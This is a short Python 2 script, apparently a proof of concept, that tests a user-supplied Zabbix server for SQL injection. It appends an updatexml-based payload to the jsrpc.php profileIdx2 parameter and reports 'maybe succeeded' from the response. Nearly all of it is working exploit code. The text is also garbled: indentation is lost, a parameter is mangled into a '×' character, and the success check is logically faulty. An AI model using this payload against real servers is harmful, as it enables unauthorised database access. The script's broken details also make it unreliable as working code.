zabbix(sql注入判断脚本)
#-*-coding:utf-8-*-
# code by anyun.org
import urllib
import re
def getHtml(url):
page = urllib.urlopen(url)
html = page.read()
html = html.replace('
', '')
html = html.replace(' ', ' ')
html = html.replace(' ', '')
html = html.replace(' ', '')
return html
url =raw_input('enter url:')
poc='jsrpc.php?type=9&method=screen.get×tamp=1471403798083&
pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23
&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17'
new_url=url+poc
try:
if getHtml(new_url).find('flickerfreescreen')<>0:
print 'maybe successeed'
else:
print 'maybe unsuccessed'
except:
print 'http error?'